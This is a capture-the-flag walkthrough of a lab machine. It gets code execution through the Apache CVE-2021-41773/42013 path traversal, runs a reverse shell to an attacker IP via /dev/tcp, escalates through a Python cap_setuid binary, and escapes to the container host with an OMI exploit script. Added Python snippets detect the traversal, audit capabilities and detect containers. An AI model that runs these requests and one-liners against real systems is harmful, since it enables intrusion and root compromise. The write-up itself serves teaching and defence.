Oh my webserver

This is a great room created by tinyBoy. We get RCE through Apache and obtain a reverse shell, then escalate privileges using Python and, after the surprise of finding the user flag in the root directory, realise we're trapped in a container. Finally, we use an exploit against the host machine to obtain the final flag.


Useful stuff

Discovery

Nmap

# Nmap 7.92 scan initiated Fri Mar  4 15:22:30 2022 as: nmap -sC -sV -p- -vv -oA scan -Pn 10.10.185.209
Nmap scan report for 10.10.185.209 (10.10.185.209)
Host is up, received user-set (0.23s latency).
Scanned at 2022-03-04 15:22:31 EST for 410s
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e0:d1:88:76:2a:93:79:d3:91:04:6d:25:16:0e:56:d4 (RSA)
| 256 91:18:5c:2c:5e:f8:99:3c:9a:1f:04:24:30:0e:aa:9b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLf6FvNwGNtpra24lyJ4YWPqB8olwPXhKdr6gSW6Dc+oXdZJbQPtpD7cph3nvR9sQQnTKGiG69XyGKh0ervYI1U=
| 256 d1:63:2a:36:dd:94:cf:3c:57:3e:8a:e8:85:00:ca:f6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEzBDIQu+cp4gApnTbTbtmqljyAcr/Za8goiY57VM+uq
80/tcp closed http reset ttl 60
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 4 15:29:21 2022 -- 1 IP address (1 host up) scanned in 410.87 seconds

Gobuster

/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/index.html (Status: 200) [Size: 45]

After visiting the site we see that there’s not much for us to exploit…

I used Wappalyzer to see that we were dealing with Apache version 2.4.49, so I did some research and ended up finding CVE-2021-41773 & CVE-2021-42013.

Foothold

If you want to learn more about the exploit, I highly advise you to check out this other room, since I also used it in order to get the initial access.

Apache Exploitation

First I used this request just to see if I could get the passwd file

curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"

Since I was able to get it, I decided to use this one-liner to get a reverse shell

sh -i >& /dev/tcp/10.13.19.12/1234 0>&1

Now let's just include it in our original request

curl -v 'http://10.10.185.209/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; sh -i >& /dev/tcp/10.13.19.12/1234 0>&1' -H "Content-Type: text/plain"

and before sending it, let’s start our listener

nc -lnvp 1234

Great! Now we’re in.
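From the defender's side, the requests above leave a clear fingerprint in Apache's access log. The following is an added example (not code from the original writeup or the room) that parses constructed combined-format log lines, double-decodes the request path and reports which requests were traversal attempts, whether they landed on a shell binary, and whether Apache let them through.

```python
"""Detect CVE-2021-41773 / CVE-2021-42013 style traversal in Apache access logs.
Added example for this writeup, not the room author's code: it parses constructed
combined-format log lines, double-decodes the request path and flags any request
whose decoded path climbs out of the served directory with '..' segments."""
import posixpath
import re
from urllib.parse import unquote

# Constructed sample; the first two lines mimic the curl requests used in the writeup.
SAMPLE_LOG = """\
10.13.19.12 - - [04/Mar/2022:15:40:01 -0500] "POST /cgi-bin/.%2e/.%2e/.%2e/bin/bash HTTP/1.1" 200 45 "-" "curl/7.81.0"
10.13.19.12 - - [04/Mar/2022:15:40:02 -0500] "GET /cgi-bin/.%%32%65/.%%32%65/etc/passwd HTTP/1.1" 403 199 "-" "curl/7.81.0"
10.10.10.5 - - [04/Mar/2022:15:41:00 -0500] "GET /index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"
10.10.10.5 - - [04/Mar/2022:15:41:03 -0500] "GET /cgi-bin/ HTTP/1.1" 403 199 "-" "gobuster/3.1"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def decode_twice(path: str) -> str:
    """Undo one encoding layer (%2e -> '.', CVE-2021-41773) and a second one
    (%%32%65 -> %2e -> '.', the CVE-2021-42013 bypass of the 2.4.50 fix)."""
    return unquote(unquote(path))

def classify(path: str):
    """None for a benign path; otherwise a dict describing the traversal attempt."""
    decoded = decode_twice(path.split("?", 1)[0])
    if ".." not in decoded.split("/"):
        return None
    resolved = posixpath.normpath(decoded)
    # With mod_cgi enabled, a traversal that lands on a shell binary is code
    # execution, which is how the writeup turned a file read into a reverse shell.
    kind = "rce" if posixpath.basename(resolved) in {"sh", "bash", "dash"} else "file-read"
    return {"raw": path, "resolved": resolved, "kind": kind}

def scan_log(text: str):
    """One finding per suspicious request, tagged with client IP and response status."""
    findings = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        hit = classify(m["path"])
        if hit:  # status 403 means Apache refused it; 200 means the traversal worked
            hit.update(ip=m["ip"], method=m["method"], status=m["status"], time=m["ts"])
            findings.append(hit)
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['method']} {f['kind']:9} {f['resolved']} -> {f['status']}")
```

A 200 on a traversal to /bin/bash is the line to alert on; the double-encoded variant is worth keeping in the rule even after patching, since it shows who is still probing.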

The first odd thing that pops up is the fact that there are no users on the machine. Weird, isn't it? Since there seems to be no user flag anywhere, I decided to do some Privilege Escalation.

Privesc

I uploaded LinPEAS to the machine by first downloading the bash script locally and starting an HTTP server using Python

python3 -m http.server 80

and downloading it on the other machine using curl, inside the tmp directory

curl http://10.13.19.12/linpeas.sh -o linpeas.sh

now give it permissions

chmod +x linpeas.sh

and finally run it

./linpeas.sh

Once it's done, we analyze the output and find that Python has capabilities (great!) and it also seems we're trapped inside a container…

╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities
Current capabilities:
Current: = cap_chown

/usr/bin/python3.7 = cap_setuid+ep

So the next thing is to leverage Python to obtain root. For this I used GTFOBins

python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Then we can get the user flag :D
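The fix for this sits on the host side, and a capability audit would have caught it before LinPEAS did. The following is an added example (not the room's or LinPEAS's code) that parses getcap output in both the older `path = cap+ep` style shown above and the newer `path cap=ep` style, flags dangerous capabilities, and treats one on an interpreter as critical because any caller can turn it into root.

```python
"""Audit file capabilities for the weakness this writeup exploited: an interpreter
carrying cap_setuid+ep, which hands any local user a root shell. Added example, not
the room's or LinPEAS's code; handles old ('path = cap+ep') and new ('path cap=ep') getcap styles."""
import re
import sys

# Capabilities that on their own reach root, or arbitrary file and process access.
DANGEROUS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
             "cap_dac_override", "cap_dac_read_search", "cap_sys_module", "cap_chown"}
# Binaries that run caller-supplied code: a capability on them is a capability for everyone.
INTERPRETER_RE = re.compile(r"/(python[0-9.]*|perl[0-9.]*|ruby[0-9.]*|node|php[0-9.]*|gdb|vim)$")
LINE_RE = re.compile(r"^(?P<path>/\S+)\s*(?:=\s*)?(?P<names>cap_[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")

def parse_getcap_line(line: str):
    """Return (path, set_of_caps, flags) or None for lines that are not getcap output."""
    m = LINE_RE.match(line.strip())
    return (m["path"], set(m["names"].split(",")), m["flags"]) if m else None

def audit(lines):
    """One finding per binary carrying a dangerous capability, with a one-line fix."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps, flags = parsed
        risky = sorted(caps & DANGEROUS)
        if not risky:
            continue
        # '+ep' (effective+permitted) means the capability is live at exec time; on an
        # interpreter that is root for whoever can run it, as python3.7 was on this box.
        severity = "critical" if INTERPRETER_RE.search(path) and "e" in flags else "high"
        findings.append({"path": path, "caps": risky, "flags": flags,
                         "severity": severity, "fix": f"setcap -r {path}"})
    return findings

# Constructed sample of `getcap -r /` output; the first line is the one LinPEAS reported.
SAMPLE = """\
/usr/bin/python3.7 = cap_setuid+ep
/usr/bin/ping = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
"""

if __name__ == "__main__":
    # Against a live system: getcap -r / 2>/dev/null | python3 audit_caps.py
    source = SAMPLE.splitlines() if sys.stdin.isatty() else sys.stdin
    for f in audit(source):
        print(f"{f['severity']:8} {f['path']}  {','.join(f['caps'])}+{f['flags']}  fix: {f['fix']}")
```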

Escaping

So…we're root, but we're still trapped…let's see what we can do now

After reviewing the Linpeas output, we find our IP is 172.17.0.2, so we can assume the host’s IP is…wait for it…172.17.0.1…great!

════════════════════════════════════╣ Network Information ╠════════════════════════════════════
╔══════════╣ Hostname, hosts and DNS
f1984047b638
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
172.17.0.2 f1984047b638

nameserver 10.0.0.2
search eu-west-1.compute.internal
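Whoever triages a shell like this one (or has to judge the blast radius of a compromised container) can make the same deductions the writeup made by hand. The following is an added example, not the room author's code: it checks for the container-id-style hostname seen above (f1984047b638), /.dockerenv and /proc/1/cgroup, and parses /proc/net/route to read the bridge gateway that the writeup guessed as 172.17.0.1. The /proc sample is constructed; live_report() reads the real files.

```python
"""Confirm the 'trapped in a container' observation and read the bridge gateway the
writeup guessed (172.17.0.1) instead of guessing it. Added example, not the room
author's code; the /proc sample below is constructed, live_report() reads the real files."""
import os
import re
import socket
import struct

CONTAINER_ID_RE = re.compile(r"^[0-9a-f]{12}$")  # Docker's default hostname is the short container id

def looks_like_container_hostname(hostname: str) -> bool:
    """f1984047b638 above matches; a normal hostname like 'ubuntu' does not."""
    return bool(CONTAINER_ID_RE.match(hostname))

def cgroup_mentions_container(cgroup_text: str) -> bool:
    """cgroup v1 layouts name the runtime in /proc/1/cgroup; cgroup v2 often shows only '0::/'."""
    return any(tok in cgroup_text for tok in ("docker", "containerd", "kubepods", "lxc"))

def parse_default_gateway(route_text: str):
    """Parse /proc/net/route (hex, little-endian fields) and return (iface, gateway) or None."""
    for line in route_text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 3 or fields[1] != "00000000":  # destination 0.0.0.0 = default route
            continue
        gateway = socket.inet_ntoa(struct.pack("<L", int(fields[2], 16)))
        return fields[0], gateway
    return None

# Constructed sample matching the writeup's container: eth0 on 172.17.0.0/16 via 172.17.0.1.
SAMPLE_ROUTE = """\
Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT
eth0\t00000000\t010011AC\t0003\t0\t0\t0\t00000000\t0\t0\t0
eth0\t000011AC\t00000000\t0001\t0\t0\t0\t0000FFFF\t0\t0\t0
"""

def live_report():
    """Run the checks on the current system; on a plain host most values come back False/None."""
    def read(path):
        try:
            with open(path) as fh:
                return fh.read()
        except OSError:
            return ""
    return {
        "hostname_is_container_id": looks_like_container_hostname(socket.gethostname()),
        "dockerenv_present": os.path.exists("/.dockerenv"),
        "cgroup_names_runtime": cgroup_mentions_container(read("/proc/1/cgroup")),
        "default_gateway": parse_default_gateway(read("/proc/net/route")),
    }
```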

In the tmp folder, where we uploaded the beautiful peas, we find a weird script called omi.py, which is based on this CVE. Since we know that the machine we're in isn't vulnerable, we can make a wild guess and try it against the host.

I did this

python3 omi.py -t 172.17.0.1 -c whoami

and got root, but since we're already root, it's kind of confusing…so I ran this instead

python3 omi.py -t 172.17.0.1 -c pwd

and boooom, we got a hit. Now the last thing is to hope that we can get our flag.

python3 omi.py -t 172.17.0.1 -c "cd /root; cat root.txt"

And that’s all :)

I enjoyed this machine a ton, since it uses a recent CVE and the container is a nice little twist; thanks to the box creator.
